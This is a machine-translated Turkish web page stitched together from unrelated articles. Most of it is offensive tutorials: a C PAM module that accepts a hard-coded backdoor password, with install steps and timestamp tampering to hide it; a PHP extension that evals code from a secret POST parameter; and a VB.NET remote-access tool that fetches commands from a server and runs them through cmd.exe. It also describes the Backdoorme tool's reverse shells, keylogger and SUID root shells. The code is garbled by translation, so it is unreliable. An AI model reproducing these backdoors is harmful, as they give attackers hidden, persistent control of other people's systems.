Menü
Bedava
kayıt
ev  /  Tavsiye/ Bir arka kapı yazmak. Arka kapıları kurmak için evrensel araç: Sistem güncellemelerinde sorun ne?

Bir arka kapı yazıyoruz. Arka kapıları kurmak için evrensel araç: Sistem güncellemelerinde sorun ne?

Saldırıya uğramış bir makinede yer edinmenin birçok yolu vardır. En yaygın ve kolay keşfedilenlerden (kendinizi kullanıcı tabanına ekleyin), uzaktaki bir makineye bir ters kabuk uygulayan karmaşık çekirdek modüllerine kadar. Ancak bunların arasında, şaşırtıcı derecede az kişinin bildiği, uygulaması çok kolay ve oldukça gizli bir yöntem var. Bu, tüm modern UNIX sistemleri tarafından kullanılan PAM kimlik doğrulama sisteminin modüllerinin bir modifikasyonudur.

PAM nedir

Takılabilir Kimlik Doğrulama Modülleri (PAM), çeşitli uygulamalarda kimlik doğrulama mekanizmalarını uygulamak için gereken bir dizi API'dir.

PAM'ın ortaya çıkmasından önce, örneğin bir anahtar kart kullanarak kimlik doğrulamayı uygulamak için geliştiricilerin, kullanıcı kimlik doğrulamasından sorumlu sistemin her bileşeninde bu aynı anahtar kartları desteklemek için kod eklemeleri gerekiyordu. Yani, oturum açma yardımcı programı sshd'nin yanı sıra bu tür bir işlevsellik eklenmesi planlanan diğer yazılımların eklenmesi ve yeniden oluşturulması gerekiyordu.

PAM'ın gelişiyle işler çok daha basit hale geldi. Şimdi, kendi benzersiz, kendi kendine yazılan kimlik doğrulama protokolünüzü sisteme eklemek için, onu tek bir PAM modülü içinde uygulamak yeterlidir. Ve PAM ile çalışabilen tüm yardımcı programlar ve uygulamalar onu alır ve kullanıcının kimliğini doğrulamak için kullanır.

Pratikte şöyle görünür: oturum açma yardımcı programı, yapılandırma dosyasında belirtilen modülleri kullanarak gerekli tüm kontrolleri gerçekleştiren ve sonucu oturum açma yardımcı programına geri döndüren PAM'ı çağırır. Uygun, değil mi? Ancak bu yaklaşım, sisteme demir atmak için kullanabileceğimiz fırsatları içerir.

Küçük bir feragatname yapmakta fayda var. Üç ana PAM uygulaması vardır:

  • Linux-PAM, herhangi bir Linux sisteminde PAM'ın ana uygulamasıdır;
  • OpenPAM - BSD sistemlerinde ve macOS'ta kullanılır;
  • JPam, Java uygulamaları için bir PAM uygulamasıdır.

Belirli bir uygulamaya odaklanmayacağız. Temel işlevsellik her yerde aynıdır.

PAM kullanarak * nix'te sabitlemenin yönleri

Katalogda her uygulama için PAM ayarlarını bulabilirsiniz. /etc/pam.d(Linux) veya /etc/pam.conf. macOS'te oturum açma yardımcı programı için bir yapılandırma dosyası örneği:

auth isteğe bağlı pam_krb5 .so use_kcminit

auth isteğe bağlı pam_ntlm .so try_first_pass

auth isteğe bağlı pam_mount .so try_first_pass

auth gerekli pam_opendirectory .so try_first_pass

hesap gerekli pam_nologin .so

hesap gerekli pam_opendirectory .so

parola gerekli pam_opendirectory .so

oturum gerekli pam_launchd .so

oturum gerekli pam_uwtmp .so

oturum isteğe bağlı pam_mount .so

Burada ne tür bir sihir olduğunu anlayalım.

Yapılandırma dosyası, başarılı kullanıcı kimlik doğrulaması veya diğer eylemlerin gerçekleştirilmesi (parolanın değiştirilmesi, kullanıcı ortamının hazırlanması) için izlenmesi gereken doğrulama kurallarını açıklar. Yapılandırma dosyasının her satırı bir kural içerir. Kontroller satır satır yapılır.

Soldan sağa: modül tipi, kontrol_bayrağı, modül adı. Yetkilendirme modülünün türü öncelikle bizi ilgilendiriyor, bu modüller kimlik doğrulamadan sorumludur. Control_flag, modülün bir özelliğidir. Aşağıdaki değerleri alabilir:

  • gerekli (gerekli) - Modül olumlu bir yanıt verirse, zincirin geri kalanı yürütülür ve istek yerine getirilir. Modül olumsuz bir yanıt verirse, istek hemen reddedilir ve diğer kontroller yapılmaz;
  • gerekli - Tıpkı zorunlu gibi: cevap evet ise, kontrol zincirinin geri kalanı gerçekleştirilir. Tek fark, olumsuz bir cevap durumunda, kontrol zincirinin yürütülmeye devam etmesi, ancak talebin reddedilmesidir;
  • yeterli - Zincirdeki önceki kontrollerin hiçbiri olumsuz çalışmadıysa, talebi karşılar. Modül olumsuz çalıştıysa, sonuç yok sayılır ve kontrol zinciri daha fazla işlenir;
  • isteğe bağlı - Modül işlenir, ancak sonuç yok sayılır.

Zaten bu aşamada, yapılandırma dosyasında küçük değişiklikler yaparak, sisteme herhangi bir şifre ile başarılı bir şekilde giriş yapabileceğimizi fark etmişsinizdir (sadece tüm yetkilendirme modüllerini isteğe bağlı olarak işaretleyin). Ancak bu çözüm, meşru kullanıcı veya yönetici, yanlış şifre ile bile sisteme başarılı bir şekilde giriş yaptığını fark etmediği sürece çalışacaktır.

Kendi arka kapı modülünüzü yazma

PAM, kendi kimlik doğrulama modüllerimizi takmamıza izin verir. Bu nedenle, "sihirli" bir şifre ile bir modül oluşturabilir ve sistemin hem standart kullanıcı şifrelerini hem de kendi şifremizi kabul etmesini sağlayabiliriz. Yanlış bir şifre girersek, oldukça beklenen kimlik doğrulama hatasını göreceğiz. Kötü bir seçenek değil.

İşte kod (sihirli şifreyi "sihirli" şifrenizle değiştirmeyi unutmayın):

#Dahil etmek

#Dahil etmek

#Dahil etmek

#Dahil etmek

#Dahil etmek

#Dahil etmek

#define MYPASSWD "sihirli şifre"

PAM_EXTERN int pam_sm_setcred (pam_handle_t * pamh, int flags, int argc, const char * * argv) (

PAM_SUCCESS döndür;

PAM_EXTERN int pam_sm_acct_mgmt (pam_handle_t * pamh, int bayrakları, int argc, const char * * argv) (

PAM_SUCCESS döndür;

PAM_EXTERN int pam_sm_authenticate (pam_handle_t * pamh, int bayrakları, int argc, const char * * argv) (

karakter * şifre = BOŞ;

pam_get_authtok (pamh, PAM_AUTHTOK, (const char * *) & şifre, NULL);

if (! strncmp (şifre, MYPASSWD, strlen (MYPASSWD)))

PAM_SUCCESS döndür;

dönüş - 1;

Modülü oluşturalım:

$ sudo apt - libpam0g kurulumunu al - dev gcc

$ gcc - fPIC - c pam_backdoor .c

$ ld - x - paylaşılan - o pam_backdoor .so pam_backdoor .o

Ve diğer modüllerle birlikte dizine koyun:

$ sudo chown kökü: kök pam_backdoor .so

$ sudo cp pam_backdoor .so / lib / x86_64 - linux - gnu / güvenlik /

dikkat et o şekilde / lib / x86_64-linux-gnu / güvenlik / Debian / Ubuntu'ya özgüdür. Fedora, Red Hat ve CentOS'ta modüller dizinde bulunur / lib64 / güvenlik /, ve Arch Linux'ta dizinde / lib / güvenlik /.

Artık geriye kalan tek şey, PAM'yi modülünüzün doğrulamasının başarılı kimlik doğrulama için yeterli olacağı şekilde yapılandırmak. Örneğin, su yardımcı programının yapılandırması ( /etc/pam.d/su):

Bazı Linux sistemlerinde, kimlik doğrulama ayarları birkaç dosyaya yerleştirilebilir: ortak-auth, ortak-parola, ortak-oturum ve ardından @include aracılığıyla belirli yardımcı programların yapılandırma dosyalarına bağlanır. Bu nokta dikkate alınmalıdır.

Yapılandırmada ayarları yaptıktan sonra, su yardımcı programı modülde belirtilen şifreyi kullanarak sizi başlatacaktır. Aynı numara, oturum açma yardımcı programı (konsol oturum açma) ve uzaktan oturum açma için sshd ile yapılabilir.

Arka kapıyı mevcut bir modüle gömme

PAM yapılandırmasını düzenlerken pam_unix.so modülünü fark etmiş olabilirsiniz. Bu modül, standart UNIX parola tabanını kullanan kullanıcı kimlik doğrulamasından sorumludur. / vb / şifre... Su, login, sshd ve diğer programlar (SecureFTPd gibi) dahil olmak üzere birçok yardımcı program tarafından kullanılır.

PAM hala açık kaynak olduğundan ve hem arka plan programının kendisinin hem de standart bileşenlerinin kaynak koduna erişimimiz olduğundan, arka kapımızı doğrudan bu modüle yerleştirebiliriz.

Gerekli değişiklikleri yapmak için PAM kaynaklarını indirin:

$ http: // www .linux - pam .org / kütüphane / Linux - PAM - 1.1.8.tar.gz

$ tar - xzf inux - PAM - 1.1.8.tar.gz

Dosyayı açma Linux-PAM-1.1.8 / modüller / pam_unix / pam_unix_auth.c ve aşağıdaki satırları arıyorum:

Orijinal modülü toplar ve kendi modülümüzle değiştiririz:

$. / yapılandır

$ yapmak

$ sudo cp Linux - PAM - 1.1.8 / modüller / pam_unix / .libs / pam_unix .so / lib / x86_64 - linux - gnu / güvenlik /

Yöneticinin değişikliği fark etmesini önlemek için, dosyanın oluşturulma zamanını, diğer modüllerin oluşturulma zamanıyla çakışacak şekilde değiştiriyoruz.

Bugün eklenti olarak bir PHP arka kapısı yazmaktan bahsedeceğiz. Tipik olarak, çoğu cracker özel komut dosyalarında bir miktar kod bırakır. Doğal olarak, bu tür şeyler sayesinde kolayca bulunur. Uzantının faydaları açıktır:

  • bulması zor
  • devre dışı bırakma işlevlerini atla
  • tüm kodu kontrol etme yeteneği
  • gizli parametre ile kod yürütmeye erişim

Ancak bu durumda dezavantajsız değildi, php yapılandırma dosyasını düzenleme yeteneğine ihtiyacınız var.

Örnek olarak, Windows altında yazacağım. Uzantıyı yazmak için Visual Studio 2012 Express Edition'ı kullandım. Ayrıca gerekli PHP sürümünün kaynaklarına ve birleştirilmiş kitaplıklara da ihtiyacınız olacak (aynı kaynaklardan oluşturabilirsiniz). Basitlik için kaynakları da indirin

Derlenmiş PHP'yi C:\php'de ve kaynakları C:\php-src'de açın.

O zaman bazı VS ayarları yapmanız gerekir.

1) Önişlemci tanımlarını ekleyin:
ZEND_DEBUG = 0
ZTS = 1
ZEND_WIN32
PHP_WIN32

2) Kaynakları bağlamak için dizinler ekleyin: C: \ php-src \ ana; C: \ php-src \ Zend; C: \ php-src \ TSRM; C: \ php-src \ normal ifade; C: \ php-src

3) php5ts.lib ile ek dizin ekleyin ( C: \ php \ dev)


4) php5ts.lib kütüphanesinin bağlantısını ekleyin.


5) Toplanan dosyanın yolunu belirtin.


Uzantıyı geliştirmek için stüdyo ayarlarını yapılandırdıktan sonra (bunun hakkında daha fazla bilgi edinebilirsiniz), "Win32 Konsol Uygulaması" türünde yeni bir arka kapı projesi oluşturalım.


Türü seçin: "DLL Kitaplığı"

Ardından, gereksiz dosyaları projeden kaldırın. sadece bırakılmalı arka kapı.cpp, stdafx.cpp ve stdafx.h.
Başlık dosyasına stdafx.h aşağıdaki kodu koyun:

#pragma once #ifndef STDAFX #define STDAFX #include "zend_config.w32.h" #include "php.h" #endif

Şimdi doğrudan uzantı koduna gidelim. Tüm satırları silip gerekli dosyaların bağlantılarını ekleyelim.

#include "stdafx.h" #include "zend_config.w32.h" #include "php.h"

Stüdyo ayarları doğruysa uyarılar kaybolacaktır. Bir modül başlatıldığında, her biri belirli koşullar altında meydana gelen birkaç olay vardır. İstek yürütülürken kodumuzu yürütmemiz gerekiyor. Bunu yapmak için ihtiyacımız olan fonksiyon ile başlatmamız gerekiyor, isim olarak "hideme" seçtim.

PHP_RINIT_FUNCTION (gizleme);

Bundan sonra, modülün başlatılmasına devam edebilirsiniz.

Zend_module_entry hideme_ext_module_entry = (STANDARD_MODULE_HEADER, "basit arka kapı", NULL, NULL, NULL, PHP_RINIT (gizleme), NULL, NULL, "1.0", STANDARD_MODULE_PROPERTIES); ZEND_GET_MODULE (hideme_ext);

Daha önce yazdığım gibi, sadece istek sırasında kodu çalıştırmamız gerekiyor, bu nedenle modülün yüklenmesi ve boşaltılmasının başlatılması NULL ile değiştirildi. Artık hideme fonksiyonunun gövdesine geçebiliriz.

PHP_RINIT_FUNCTION (hideme) (char * method = "_POST"; // parametre ve değeri aldığımız süper küresel dizi char * secret_string = "secret_string"; // kötü kodu içerecek parametre zval ** arr; char * code; if (zend_hash_find (& EG (symbol_table), method, strlen (method) + 1, (void **) & arr)! = FAILURE) (HashTable * ht = Z_ARRVAL_P (* arr); zval ** val; if (zend_hash_find (ht , secret_string, strlen (secret_string) + 1, (void **) & val)! = FAILURE) (// gerekli parametreyi karma tablo kodunda arayın = Z_STRVAL_PP (val); // parametre değeri zend_eval_string (kod, NULL, (char *) "" TSRMLS_CC); // kod yürütme)) BAŞARIYI döndür;)

Yorumlardan anlaşılmalıdır. İlk olarak parametreleri belirledik. yöntem ve secret_string... Ardından seçilen diziyi inceleriz ve uygun bir anahtarla bir parametre ararız, varsa ondan bir değer alır ve kodu çalıştırırız. zend_eval_string.

Montajdan sonra, uzantı olarak kullanılabilecek bir kütüphane elde ediyoruz.

GNU Linux'ta Gösteri

Windows'ta Demo:

Herkese merhaba) Daha önce fark ettiğiniz gibi bugün size kendi arka kapınızı "herhangi bir dilde" nasıl yazacağınızı anlatacağım (Program yazmayı biliyorsanız ve hayal gücünüz varsa).

Öncelikle admin ve client arasında bir bağlantı oluşturmamız gerektiği gerçeğiyle başlayalım. Bunun için PHP ve sadece 5 satır kod kullanıyoruz)

if ($ _GET ["cmd"]! = "cmd_clear") ($ cmd = fopen ("cmd.txt", "w +"); // Boş bir dosya oluşturun, varsa temizleyin. fwrite ( $ cmd, $ _GET ["cmd"]); // "cmd" parametresinin içindekini itin ve hatırladığımız gibi "msg (HelloWorld!)" vardı Fclose ($ cmd); // arkamızdaki dosyayı kapatın ) else ($ cmd = fopen ("cmd.txt", "w"); // Yeni bir dosya oluştur (yani cmd.txt'imizi temizle) fclose ($ cmd); // arkamızdaki dosyayı kapat)


Bu kodu internette bir yerde buldum.
Bu kod, arka kapımız için komutlar bırakacaktır)

O halde admin paneline geçelim, önce formun üzerine bir buton ve bir textbox ve bir web tarayıcısı çizelim ki bana karışmasın diye ikinci forma koydum)

Ardından, koda geçelim

Sitemizi program başladığında yüklenecek şekilde belirtiyoruz) ve onu global bir değişken olarak ilan ediyoruz.

Public www As String Private Sub Form1_Load (ByVal sender As System.Object, ByVal e As System.EventArgs) MyBase.Load'u İşler www = "http: // localhost /" End Sub

Sitedeki admin panelimize GET isteği gönderelim dediğimiz butonu tekrar canlandıralım cmd=ekibimiz den sonra msg tagı daha sonra client tarafından işlenmesi için gerekli olacaktır.

Private Sub Button1_Click (ByVal gönderici As System.Object, ByVal e As System.EventArgs) Button1.Click Form2.WebBrowser1.Navigate'i (www & "rat / admin.php? Cmd =< msg>"& TextBox1.Text &"< /msg>") TextBox1.Text =" "End Sub

Admin panelimiz hazır)

Gelelim client kısmına) timer haricinde forma herhangi bir şey atmıyoruz)

Programımızın siteyi kontrol edeceği timer'ı (cmd.txt dosyası) yazalım ve tabii ki timer programla birlikte başlıyor)) Tıpkı admin panelinde olduğu gibi global değişkenler tanımlayacağız, şimdi iki tane var. , ve ayrıca iki kütüphaneyi bağlamamız gerekiyor

System.Text Imports System.IO Public WC As New System.Net.WebClient Public www As String Private Sub Form1_Load (ByVal sender As System.Object, ByVal e As System.EventArgs) MyBase.Load www = "http: // localhost / "Timer1.Enabled = True Timer1.Interval = 5000 End Sub

Kolaylık sağlamak için yapay bir gecikme yaptım

Eh, şimdi zamanlayıcının kodu, yani. ne yapılmalı) Önce verilerimizi ayrıştırın) bunun için msg etiketini belirledik, peki daha sonra Shell komutu ile belirtilen komutlarla komut satırını çalıştırıyoruz)

Private Sub Timer1_Tick (ByVal gönderici As System.Object, ByVal e As System.EventArgs) Timer1.Tick Dim R () As String = ("< msg>") Dim L () As String = ("< /msg>") MyHttpWebRequest As Net.HttpWebRequest = Net.HttpWebRequest.Create (www &" rat / cmd.txt ") Dim myHttpWebResponse Net.HttpWebResponse = myHttpWebRequest.GetResponse (12) . String = myStreamReader.ReadToEnd () InStr (Str, R (0)) 0 ise Dim Tmp As String = Str.Split (R, StringSplitOptions.None) (1) Dim Res As String = Tmp.Split (L, StringSplitOptions. Yok) (0) WC.DownloadString (www & "rat / admin.php? Cmd = clear_cmd") Bekle (2) Kabuk ("cmd.exe" + Res) Else End If End Sub


not Bu makaleyle ilgileniyorsanız, bir dahaki sefere müşterimizin eylemlerini nasıl gizleyeceğimiz hakkında bir makale yapacağım.

Backdoorme - otomatik olarak arka kapılar oluşturmak için yardımcı program

Backdoorme, Unix makinelerinde birçok arka kapı oluşturabilen güçlü bir yardımcı programdır. Backdoorme, şaşırtıcı genişletilebilirlikle tanıdık metasploit arayüzünü kullanır. Backdoorme, kurbanın içinden geçip herhangi bir boşluk oluşturabileceği mevcut SSH bağlantısının veya kimlik bilgilerinin mülkiyetine dayanır. Lütfen Backdoorme'u açık izinle kullanın.

misafirlerden gizli


Backdoorme, bir dizi yerleşik arka kapı, modül ve yardımcı modül ile kutudan çıkar çıkmaz gelir. Arka kapılar, netcat arka kapısı veya msfvenom arka kapısı gibi gerekli arka kapıyı oluşturmak ve dağıtmak için özel bileşenlerdir. Modüller herhangi bir arka kapıya uygulanabilir ve arka kapıları daha güçlü, gizli veya daha hızlı devre dışı bırakmak için kullanılır. Yedekler, kalıcılığın korunmasına yardımcı olmak için gerçekleştirilebilecek faydalı işlemlerdir.

Arka kapılar hakkında biraz daha: Backdoorme'u çalıştırmak için gerekli bağımlılıklara sahip olduğunuzdan emin olun.

$ python bağımlılıkları.py

Arka kapı lansmanı:

$ piton ustası.py

arka kapılar

Arka kapıyı kullanmak için "use" anahtar sözcüğünü çalıştırmanız yeterlidir.

>> Shell / metasploit kullan + Mevcut hedef 1'i kullanarak + Metasploit arka kapısını kullanarak ... (msf) >>

Buradan seçenekleri arka kapıya uyacak şekilde ayarlayabilirsiniz. Yapılandırılabilen seçeneklerin listesini görüntülemek için "seçenekleri göster" veya "yardım"ı çalıştırın.

Metasploit'te olduğu gibi, arka kapılar kategoriler halinde düzenlenmiştir.

  • Ek
    • tuş kaydedici- Sisteme bir keylogger ekler ve sonuçları posta ile geri gönderme seçeneğini size sunar;
    • basit http- İstemciye python SimpleHTTP sunucusunu kurar.
    • kullanıcı- Hedefe yeni bir kullanıcı ekler.
    • - İstemciye Apache Sunucusunu kurar.
  • İlerletme (Uzantı Kategorisi)
    • setuid- SetUID arka kapısı, kullanıcının root erişimine sahip olduğunu varsayarak, yürütülebilir dosyadaki setuid bitini ayarlayarak çalışır. Böylece, bu yürütülebilir dosya daha sonra kök erişimi olmayan bir kullanıcı tarafından başlatıldığında, verilen dosya kök erişimi ile yürütülür. Varsayılan olarak, bu arka kapı setuid bitini nano olarak değiştirir, böylece kök erişimi herhangi bir şekilde kaybolursa, bir saldırgan SSH'yi ayrıcalıksız bir kullanıcı olarak geri alabilir ve yine de nano'yu (veya herhangi bir ikili dosyayı) kök olarak çalıştırabilir. ("nano / vb / gölge"). Bu arka kapı uzantısını dağıtmak için en başta kök erişiminin gerekli olduğunu unutmayın.
    • kabuk- shell backdoor, SetUID uzantılı kardeşine benzer (ancak daha spesifik) ayrıcalıklı bir arka kapı uzantısıdır. Bash kabuğunu gizli bir ikili dosyaya çoğaltır ve SUID bitini ayarlar. Bu arka kapı uzantısını dağıtmak için başlangıçta kök erişiminin gerekli olduğunu lütfen unutmayın. SSH ayrıcalıksız bir kullanıcı olarak hareket ediyorsa bu arka kapıyı kullanmak için ".bash -p" komutunu çalıştırmanız yeterlidir ve kök erişiminiz olacaktır.
  • Kabuk (Kabuk Kategorisi)
    • bash- belirli bir ip ve port kombinasyonuna bağlanmak için basit bir bash betiği kullanır ve sonucu bash'a iletir.
    • bash2- yukarıda açıklanan ve istemciden parola istemeyen biraz farklı (ve daha güvenli) bash arka kapısı.
    • metasploit- hedefte reverse_tcp ikili dosyası oluşturmak için msfvenom'u kullanır, ardından ölçüm yorumlayıcı sarmalayıcısına bağlanmak için ikili çalıştırır.
    • ağ kedisi- standart girdi ve çıktıyı / bin / sh'ye geçirmek için netcat'i kullanır ve kullanıcıya etkileşimli bir kabuk verir.
    • netcat_traditional- ters bir kabuk oluşturmak için netcat-traditional "s -e" kullanır.
    • perl Perl ile yazılmış, sonucu bash'a yönlendiren ve süreci daha az belirgin görünmesi için yeniden adlandıran bir komut dosyasıdır.
    • php- sonucu bash'a gönderen bir php arka kapısını çalıştırır. Web sunucusunu otomatik olarak kurmaz, bunun yerine web modülünü kullanır.
    • köpek yavrusu- üzerinde bulunan n1nj4sec Pupy arka kapısını kullanır

      misafirlerden gizli

      .
    • piton- komutları yürütmek ve sonuçları kullanıcıya geri göndermek için kısa bir python betiği kullanır.
    • - web sunucusunu hedefe gönderir, ardından msfvenom php reverse_tcp arka kapısını indirir ve ana bilgisayara bağlanır. Bu hala bir php arka kapısı olsa da, yukarıda açıklanan php arka kapısı ile aynı değildir.
  • Erişim
    • kaldır_ssh- istemcideki ssh sunucusunu kaldırır. Herhangi bir izi kaldırmak için arka kapı oturumunun sonunda kullanmak çok uygundur.
    • ssh_key- RSA anahtarı oluşturur ve ssh şifresi olmadan bağlantı için hedefe kopyalar.
    • ssh_port- ssh için yeni bir bağlantı noktası ekler.
  • Windows (Windows kategorisi)
    • pencereler- Bir pencere arka kapısı oluşturmak için msfvenom'u kullanır.
Modüller

Her arka kapı, arka kapıyı daha güçlü hale getirmek için kullanılan ek modüller edinme yeteneğine sahiptir. Modül eklemek için "add" anahtar sözcüğünü kullanmanız yeterlidir.

(msf) >> zehir ekle + Zehir modülü eklendi

Her modülün yapılandırılabilir ek parametreleri vardır ve "yardım" yeniden çalıştırılırsa ek seçenekleri görebilir veya ayarlayabilirsiniz.

Şu anda mevcut olan modüller şunları içerir:

  • Zehir
    • Depo zehirlenmesi hedef bilgisayarı üret - Bir sistem yardımcı programını ve mevcut bir arka kapıyı çağırmak için yürütülebilir bir dosya derler.
    • Örneğin, zehirleme kutusu modülü "ls" ile çalıştırılırsa, hem mevcut arka kapıyı hem de orijinal "ls"yi çalıştıracak "ls" adlı bir ikili dosyayı derler ve taşır, böylece kullanıcının arka kapıyı daha sık çalıştırmasını engeller. .
  • cron
    • Belirtilen frekansta çalışması için kök kullanıcının crontab'ına mevcut bir arka kapı ekler.
    • Bir web sunucusu kurar ve arka kapıyı çalıştıran bir web sayfasını barındırır.
    • Sadece açık bir dinleyiciyle siteye gider ve arka kapı açılır.
  • kullanıcı
    • Hedefe yeni bir kullanıcı ekler.
  • Başlamak
    • bashrc ve init dosyalarıyla arka kapılar oluşturmaya izin verir.
  • beyaz liste
    • Yalnızca bu IP'nin arka kapıya bağlanabilmesi için IP'yi beyaz listeye ekler.
Tercüme:

Habré'deki blogumuzda, yalnızca telekom operatörleri "Hydra" için ürün faturalandırmamızın geliştirilmesinden bahsetmekle kalmıyor, aynı zamanda altyapı ile çalışma ve teknolojileri kullanma hakkında materyaller de yayınlıyoruz.

Alman gazeteci ve bilgisayar korsanı Leif Ryge, Ars Technica için yazılım güncellemelerini düzenlemeye yönelik modern yaklaşımın ciddi bilgi güvenliği riskleri taşıdığına dair ilginç bir makale yazdı. Bu yazının ana düşüncelerini dikkatinize sunuyoruz.

Arka plan

2014'te Washington Post, Apple ve Google gibi şirketlerin ürünlerine erişebilecekleri ve ancak yasal bir çözüm bulurlarsa özel hizmetlere aktarabilecekleri gizli bir anahtar gibi bir şey icat etmeleri gerektiğini yazmıştı.

Her biri kritik hale gelebilecek bir saldırı olan "zayıf bağlantılardan" kurtulmak, herhangi bir yeni yazılım dağıtım mekanizması için temel bir gereklilik haline gelmelidir.